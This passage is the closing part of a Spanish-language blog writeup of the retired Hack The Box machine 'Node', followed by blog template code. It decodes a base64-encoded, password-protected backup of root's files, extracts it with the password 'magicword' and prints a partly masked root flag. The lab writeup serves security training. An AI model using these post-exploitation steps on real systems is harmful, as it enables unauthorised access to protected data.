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"| base64 -d &gt; root.zip
</code></pre></div></div>
<p>Usando 7z x para extraer el archivo root.zip</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>─# 7z x root.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz (906EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed): "magicword"
Everything is Ok
Size:       2584
Compressed: 1141
                                                                                                      
(root💀kali)-[/home/…/HTB/OSCP/Node/tmp]
└─# ls
root.txt  root.zip
</code></pre></div></div>
<p>Procedemos a sacar la flag de root.txt</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat root.txt </span>
1722e99ca5f353b3625xxxxxxxxxxxxxx
</code></pre></div></div>

<p>Maquina Rooteada =)</p>


</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2021/07/22/Node.html';
     this.page.identifier = '/2021/07/22/Node';
     this.page.title = 'OSCP Path ~ Node de Hack The Box (Necesario VIP)';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/06/27/Trick.html">
            Maquina  Retirada Trick de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/15/Attacktive-Directory.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/%2C/" class="set-1">,</a> <a href="/tag/1.8%2C/" class="set-1">1.8,</a> <a href="/tag/4.4%2C/" class="set-1">4.4,</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/adrotate%2C/" class="set-1">ADRotate,</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/autopwn%2C/" class="set-1">AutoPwn,</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bof%2C/" class="set-1">BOF,</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/blind%2C/" class="set-1">Blind,</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/bruteforce%2C/" class="set-1">Bruteforce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/curl%2C/" class="set-1">CURL,</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/command/" class="set-1">Command</a> <a href="/tag/contracts%2C/" class="set-1">Contracts,</a> <a href="/tag/cracking/" class="set-1">Cracking</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/crontabs%2C/" class="set-1">CronTabs,</a> <a href="/tag/crypto%2C/" class="set-1">Crypto,</a> <a href="/tag/curlftp%2C/" class="set-1">CurlFtp,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" class="set-1">Directory,</a> <a href="/tag/dockers%2C/" class="set-1">Dockers,</a> <a href="/tag/domain/" class="set-1">Domain</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/ethereum%2C/" class="set-1">Ethereum,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/execel/" class="set-1">Execel</a> <a href="/tag/exploit%2C/" class="set-1">Exploit,</a> <a href="/tag/fail2ban%2C/" class="set-1">Fail2ban,</a> <a href="/tag/file/" class="set-1">File</a> <a href="/tag/file%2C/" class="set-1">File,</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/ftp%2C/" class="set-1">Ftp,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing/" class="set-1">Fuzzing</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gitlab%2C/" class="set-1">GitLab,</a> <a href="/tag/gitbucket%2C/" class="set-1">Gitbucket,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hackthebox%2C/" class="set-1">HackTheBox,</a> <a href="/tag/hacking/" class="set-3">Hacking</a> <a href="/tag/hacking%2C/" class="set-2">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hijacking%2C/" class="set-1">Hijacking,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/ipfs%2C/" class="set-1">IPFS,</a> <a href="/tag/ipv6%2C/" class="set-1">IPV6,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/id-rsa%2C/" class="set-1">Id-Rsa,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/inclusion%2C/" class="set-1">Inclusion,</a> <a href="/tag/injection%29%2C/" class="set-1">Injection),</a> <a href="/tag/injection%2C/" class="set-1">Injection,</a> <a href="/tag/jjs%2C/" class="set-1">JJS,</a> <a href="/tag/jndi%2C/" class="set-1">JNDI,</a> <a href="/tag/joomla%2C/" class="set-1">Joomla,</a> <a href="/tag/journalctl%2C/" class="set-1">Journalctl,</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/kernel/" class="set-1">Kernel</a> <a href="/tag/knocking%2C/" class="set-1">Knocking,</a> <a href="/tag/kubernetes%2C/" class="set-1">Kubernetes,</a> <a href="/tag/ldap/" class="set-1">LDAP</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/local/" class="set-1">Local</a> <a href="/tag/log4j%2C/" class="set-1">Log4j,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/malicius/" class="set-1">Malicius</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mattermost%2C/" class="set-1">Mattermost,</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/misconfigurations%2C/" class="set-1">Misconfigurations,</a> <a href="/tag/mongo-db%2C/" class="set-1">Mongo-db,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mr.robot%2C/" class="set-1">Mr.Robot,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/nosqli%2C/" class="set-1">NoSQLI,</a> <a href="/tag/node-red%2C/" class="set-1">Node-Red,</a> <a href="/tag/nostromo/" class="set-1">Nostromo</a> <a href="/tag/os/" class="set-1">OS</a> <a href="/tag/oscp/" class="set-3">OSCP</a> <a href="/tag/osticket%2C/" class="set-1">OSTicket,</a> <a href="/tag/offensive/" class="set-1">Offensive</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path/" class="set-1">Path</a> <a href="/tag/path%2C/" class="set-3">Path,</a> <a href="/tag/pivoting%2C/" class="set-1">Pivoting,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/pods%2Fcontainer./" class="set-1">Pods/Container.</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/port/" class="set-1">Port</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portainer%2C/" class="set-1">Portainer,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/protection%2C/" class="set-1">Protection,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/python3%2C/" class="set-1">Python3,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/read%2C/" class="set-1">Read,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/revome/" class="set-1">Revome</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a href="/tag/snmp%2C/" class="set-1">SNMP,</a> <a href="/tag/sqli/" class="set-1">SQLI</a> <a href="/tag/sqli%2C/" class="set-1">SQLI,</a> <a href="/tag/sqlinjecction%2C/" class="set-1">SQLInjecction,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/ssti%28server/" class="set-1">SSTI(Server</a> <a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/script%2C/" class="set-1">Script,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/security%2C/" class="set-1">Security,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/side/" class="set-1">Side</a> <a href="/tag/smart/" class="set-1">Smart</a> <a href="/tag/smb%2C/" class="set-1">Smb,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/subdomains%2C/" class="set-1">Subdomains,</a> <a href="/tag/sudo/" class="set-1">Sudo</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/template/" class="set-1">Template</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/tomcat%2C/" class="set-1">Tomcat,</a> <a href="/tag/transfer%2C/" class="set-1">Transfer,</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/tryhackme%2C/" class="set-1">TryHackMe,</a> <a href="/tag/ubuntu/" class="set-1">Ubuntu</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-2">Web</a> <a href="/tag/web3%2C/" class="set-1">Web3,</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-2">Writeup</a> <a href="/tag/writeup%2C/" class="set-3">Writeup,</a> <a href="/tag/x-forwarder-for%2C/" class="set-1">X-Forwarder-For,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/ysoserial%2C/" class="set-1">Ysoserial,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/zone/" class="set-1">Zone</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/bashscript%2C/" class="set-1">bashscript,</a> <a href="/tag/chisel%2C/" class="set-1">chisel,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/dompdf%2C/" class="set-1">dompdf,</a> <a href="/tag/ecppt%2C/" class="set-1">eCPPT,</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/msfvenom%2C/" class="set-1">msfvenom,</a> <a href="/tag/nmap%2C/" class="set-1">nmap,</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/redis-cli%2C/" class="set-1">redis-cli,</a> <a href="/tag/rsync%2C/" class="set-1">rsync,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/socat%2C/" class="set-1">socat,</a> <a href="/tag/squidproxy%2C/" class="set-1">squidproxy,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/webdav%2C/" class="set-1">webdav,</a> <a href="/tag/welcome/" class="set-1">welcome</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'Writeup de la maquina de HackTheBox llamada NODE siguiendo el PATH para el OSCP';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
